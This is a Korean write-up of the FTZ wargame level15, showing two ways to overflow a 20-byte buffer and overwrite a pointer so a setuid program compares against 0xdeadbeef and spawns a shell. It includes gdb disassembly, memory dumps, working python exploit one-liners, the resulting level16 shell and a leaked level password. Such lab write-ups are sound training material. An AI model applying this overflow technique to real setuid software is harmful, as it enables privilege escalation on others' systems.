[FTZ] level15 풀이

💡 FTZ level15 풀이

문제

계정 : level15/guess what

hint

#include <stdio.h>

main()
{ int crap;
  int *check;
  char buf[20];
  fgets(buf,45,stdin);
  if (*check==0xdeadbeef)
   {
     setreuid(3096,3096);
     system("/bin/sh");
   }
}

풀이

이번 문제는 2가지의 방법으로 풀어보겠습니다.

환경변수

계속 이용하던 환경 변수를 이용하여 문제를 해결할 수 있습니다.

하지만 이전 문제들과 다르게 주의를 해야 하는 부분이 존재합니다.

이번 문제는 ret 주소를 덮어 쓰는게 아닌, check 변수를 덮어써서 check 변수의 포인터가 가리키고 있는 위치에 0xdeadbeef 값이 있으면 쉘을 얻을 수 있습니다.

다른 쉘을 따는 문제들에서는 환경변수의 위치가 몇 바이트 다르게 나와도 nop(0x90) 문자를 이용하여 보완해 줬다면, 이번 문제에서는 1바이트라도 다르면 segmentation falut 오류가 발생합니다.

우선 ‘정확하게’ 환경변수의 위치를 맞추기 위해서 알아야 하는 사항은 환경변수가 스택에 불러진다는 사실과, 이 변수들은 실행 프로그램 이름에 길이에 영향을 받는다는 것입니다.

다음의 코드를 보면 같은 환경변수 주소를 구하는 코드지만 이름이 1글자 차이에 위치가 2 byte 차이가 나는 것을 볼 수 있습니다.

[level15@ftz tmp]$ echo 'int main(){printf("%p\n",getenv("CHECK"));}'>> env.c
[level15@ftz tmp]$ gcc -o env12345 env.c
[level15@ftz tmp]$ gcc -o env1234 env.c
[level15@ftz tmp]$ gcc -o env123 env.c
[level15@ftz tmp]$ ./env123
0xbffffcc3
[level15@ftz tmp]$ ./env1234
0xbffffcc1
[level15@ftz tmp]$ ./env12345
0xbffffcbf

따라서 이번에는 환경변수를 정확하게 얻기 위해서 attackme 프로그램의 이름 길이가 8자리 이므로 env12345 프로그램으로 구한 0xbffffcbf주소를 사용합니다.

gdb를 이용하여 buf 위치와 check 변수의 위치가 얼만큼 차이나는지 확인 합니다.

[level15@ftz level15]$ gdb -q attackme
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x08048490 <main+0>:    push   ebp
0x08048491 <main+1>:    mov    ebp,esp
0x08048493 <main+3>:    sub    esp,0x38
0x08048496 <main+6>:    sub    esp,0x4
0x08048499 <main+9>:    push   ds:0x8049664
0x0804849f <main+15>:   push   0x2d
0x080484a1 <main+17>:   lea    eax,[ebp-56]       //buf 위치
0x080484a4 <main+20>:   push   eax
0x080484a5 <main+21>:   call   0x8048360 <fgets>
0x080484aa <main+26>:   add    esp,0x10
0x080484ad <main+29>:   mov    eax,DWORD PTR [ebp-16]   //check 위치
0x080484b0 <main+32>:   cmp    DWORD PTR [eax],0xdeadbeef
0x080484b6 <main+38>:   jne    0x80484dd <main+77>
0x080484b8 <main+40>:   sub    esp,0x8
0x080484bb <main+43>:   push   0xc18
0x080484c0 <main+48>:   push   0xc18
0x080484c5 <main+53>:   call   0x8048380 <setreuid>
0x080484ca <main+58>:   add    esp,0x10
0x080484cd <main+61>:   sub    esp,0xc
0x080484d0 <main+64>:   push   0x8048548
0x080484d5 <main+69>:   call   0x8048340 <system>
0x080484da <main+74>:   add    esp,0x10
0x080484dd <main+77>:   leave
0x080484de <main+78>:   ret
0x080484df <main+79>:   nop
End of assembler dump.

총 40바이트의 위치가 차이 납니다.

따라서 dummy 문자로 40바이트를 체운 뒤, 환경 변수 주소를 입력해 줍니다. 성공적으로 쉘을 획득했습니다.

[level15@ftz level15]$ (python -c'print("A"*40+"\xbf\xfc\xff\xbf")';cat)|./attackme

id
uid=3096(level16) gid=3095(level15) groups=3095(level15)

my-pass
Level16 Password is "about to cause mass".

스택에서 찾기

check의 포인터의 값과 0xdeadbeef 값을 비교를 하기 위해서 분명히 메모리 상에 0xdeadbeef 값을 저장한 위치가 있을 것입니다.

이번에는 그 값을 찾아서 해결해 보겠습니다.

먼저 디버깅을 위해서 attackme 파일을 tmp폴더로 복사한 뒤에 gdb를 실행시켜 줍니다.

[level15@ftz tmp]$ gdb -q attackme
(gdb) set disas intel
(gdb) disass main
Dump of assembler code for function main:
0x08048490 <main+0>:    push   ebp
0x08048491 <main+1>:    mov    ebp,esp
0x08048493 <main+3>:    sub    esp,0x38
0x08048496 <main+6>:    sub    esp,0x4
0x08048499 <main+9>:    push   ds:0x8049664
0x0804849f <main+15>:   push   0x2d
0x080484a1 <main+17>:   lea    eax,[ebp-56]
0x080484a4 <main+20>:   push   eax
0x080484a5 <main+21>:   call   0x8048360 <fgets>
0x080484aa <main+26>:   add    esp,0x10
0x080484ad <main+29>:   mov    eax,DWORD PTR [ebp-16]
0x080484b0 <main+32>:   cmp    DWORD PTR [eax],0xdeadbeef //브레이크 지점
0x080484b6 <main+38>:   jne    0x80484dd <main+77>
0x080484b8 <main+40>:   sub    esp,0x8
0x080484bb <main+43>:   push   0xc18
0x080484c0 <main+48>:   push   0xc18
0x080484c5 <main+53>:   call   0x8048380 <setreuid>
0x080484ca <main+58>:   add    esp,0x10
0x080484cd <main+61>:   sub    esp,0xc
0x080484d0 <main+64>:   push   0x8048548
0x080484d5 <main+69>:   call   0x8048340 <system>
0x080484da <main+74>:   add    esp,0x10
0x080484dd <main+77>:   leave
0x080484de <main+78>:   ret
0x080484df <main+79>:   nop
End of assembler dump.

포인터 값과 0xdeadbeef 값을 비고ㅛ하는 지점인 main+32주소에 브레이크를 걸고 실행합니다.

(gdb) b *main+32
Breakpoint 1 at 0x80484b0
(gdb) run
Starting program: /home/level15/tmp/attackme
test

Breakpoint 1, 0x080484b0 in main ()
(gdb) info reg
eax            0xbffff138       -1073745608
ecx            0x5      5
edx            0x4212e130       1108533552
ebx            0x42130a14       1108544020
esp            0xbffff100       0xbffff100
ebp            0xbffff138       0xbffff138
esi            0x40015360       1073828704
edi            0x8048520        134513952
eip            0x80484b0        0x80484b0
eflags         0x286    646
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x33     51

eip 지점에 대해서 16개의 word를 출력해 봅니다.

(gdb) x/16xw $eip
0x80484b0 <main+32>:    0xbeef3881      0x2575dead      0x6808ec83      0x00000c18
0x80484c0 <main+48>:    0x000c1868      0xfeb6e800      0xc483ffff      0x0cec8310
0x80484d0 <main+64>:    0x04854868      0xfe66e808      0xc483ffff      0x90c3c910
0x80484e0 <__do_global_ctors_aux>:      0x53e58955      0xa104ec83      0x0804962c      0x04962cbb
(gdb)

맨 처음 2개의 word를 보면 beef와 dead가 나누어서 저장되어 있는게 보입니다. 현재 주소가 0xb0으로 끝나므로 2바이트를 밀어서 출력해 봅니다.

(gdb) x/2xw 0x80484b2
0x80484b2 <main+34>:    0xdeadbeef      0xec832575
(gdb)

0xdeadbeef가 저장된 메모리 주소는 0x80484b2입니다.

이를 이용해서 check 값을 해당 메모리 주소로 덮어주면 쉘을 획득할 수 있습니다.

[level15@ftz level15]$ (python -c 'print("A"*40+"\xb2\x84\x04\x08")';cat) | ./attackme
id
uid=3096(level16) gid=3095(level15) groups=3095(level15)